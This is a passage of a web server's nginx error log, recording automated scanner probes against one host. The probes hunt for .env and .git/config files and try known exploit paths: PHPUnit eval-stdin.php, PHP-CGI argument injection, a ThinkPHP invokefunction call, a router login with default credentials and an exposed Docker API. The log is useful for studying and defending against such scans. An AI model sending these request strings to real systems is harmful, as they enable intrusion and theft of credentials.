client: 209.38.90.125, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/18 05:40:09 [error] 393#393: *282990 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 05:49:54 [error] 393#393: *283139 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "91.82.83.208" +2026/01/18 05:57:58 [error] 394#394: *283152 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 135.119.112.180, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "91.82.83.208" +2026/01/18 06:35:50 [error] 394#394: *283179 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:02:37 [error] 394#394: *283206 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.83.208" +2026/01/18 07:13:58 [error] 395#395: *283218 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:58 [error] 395#395: *283218 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:59 [error] 395#395: *283218 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:59 [error] 395#395: *283218 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:59 [error] 395#395: *283218 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:59 [error] 395#395: *283218 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:13:59 [error] 395#395: *283218 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:00 [error] 395#395: *283218 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:00 [error] 395#395: *283218 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:00 [error] 395#395: *283218 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:00 [error] 395#395: *283218 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:00 [error] 395#395: *283218 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:01 [error] 395#395: *283218 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:01 [error] 395#395: *283218 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:01 [error] 395#395: *283218 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:02 [error] 395#395: *283218 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:02 [error] 395#395: *283218 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:02 [error] 395#395: *283218 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:02 [error] 395#395: *283218 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:02 [error] 395#395: *283218 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:03 [error] 395#395: *283218 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:03 [error] 395#395: *283218 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:03 [error] 395#395: *283218 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:03 [error] 395#395: *283218 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:04 [error] 395#395: *283218 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:04 [error] 395#395: *283218 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:04 [error] 395#395: *283218 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:04 [error] 395#395: *283218 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:05 [error] 395#395: *283218 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:05 [error] 395#395: *283218 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:05 [error] 395#395: *283218 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:05 [error] 395#395: *283218 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:05 [error] 395#395: *283218 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:06 [error] 395#395: *283218 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:06 [error] 395#395: *283218 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:06 [error] 395#395: *283218 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:06 [error] 395#395: *283218 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:07 [error] 395#395: *283218 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:07 [error] 395#395: *283218 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:07 [error] 395#395: *283218 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:08 [error] 395#395: *283218 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:14:25 [error] 395#395: *283219 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 07:28:07 [error] 395#395: *283231 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 219.157.65.142, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" +2026/01/18 08:11:17 [error] 395#395: *283281 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:17 [error] 395#395: *283282 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:17 [error] 395#395: *283283 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:19 [error] 395#395: *283284 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:19 [error] 395#395: *283285 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283286 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283288 open() "/var/www/html/docker.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /docker.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283289 open() "/var/www/html/icon/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /icon/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283290 open() "/var/www/html/local/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /local/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283291 open() "/var/www/html/.docker/laravel/app/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283292 open() "/var/www/html/login/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /login/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283293 open() "/var/www/html/engine/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /engine/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:20 [error] 396#396: *283294 open() "/var/www/html/.env_old" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env_old HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283295 open() "/var/www/html/export/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /export/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283296 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283297 open() "/var/www/html/v3/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /v3/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283298 open() "/var/www/html/libs/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /libs/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283299 open() "/var/www/html/linux/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /linux/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283300 open() "/var/www/html/.env.docker" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.docker HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 396#396: *283301 open() "/var/www/html/api/v2/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/v2/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:21 [error] 393#393: *283302 open() "/var/www/html/.env.prod.local" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.prod.local HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283303 open() "/var/www/html/site/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /site/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283304 open() "/var/www/html/dependencies/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dependencies/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283305 open() "/var/www/html/sandbox/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sandbox/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283306 open() "/var/www/html/contact/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /contact/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283307 open() "/var/www/html/build/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /build/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283308 open() "/var/www/html/bot/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /bot/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283309 open() "/var/www/html/office/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /office/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:11:22 [error] 393#393: *283310 open() "/var/www/html/repo/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /repo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 08:27:38 [error] 393#393: *283335 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 10:57:17 [error] 402#402: *283455 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 11:06:51 [error] 400#400: *283463 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 11:10:43 [error] 400#400: *283468 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 11:21:57 [error] 400#400: *283479 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 11:21:58 [error] 400#400: *283481 open() "/var/www/html/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "91.82.83.208" +2026/01/18 11:21:59 [error] 400#400: *283483 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 11:22:00 [error] 400#400: *283485 open() "/var/www/html/public/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/env HTTP/1.1", host: "91.82.83.208" +2026/01/18 11:22:01 [error] 400#400: *283487 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 11:38:01 [error] 400#400: *283500 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:21:16 [error] 401#401: *283535 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:23 [error] 401#401: *283556 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:24 [error] 401#401: *283556 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:24 [error] 401#401: *283556 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:25 [error] 401#401: *283556 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:26 [error] 401#401: *283556 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:26 [error] 401#401: *283556 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:27 [error] 401#401: *283556 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:27 [error] 401#401: *283556 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:28 [error] 401#401: *283556 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:29 [error] 401#401: *283556 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:29 [error] 401#401: *283556 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:30 [error] 401#401: *283556 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:30 [error] 401#401: *283556 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:31 [error] 401#401: *283556 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:32 [error] 401#401: *283556 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:32 [error] 401#401: *283556 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:33 [error] 401#401: *283556 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:33 [error] 401#401: *283556 open() 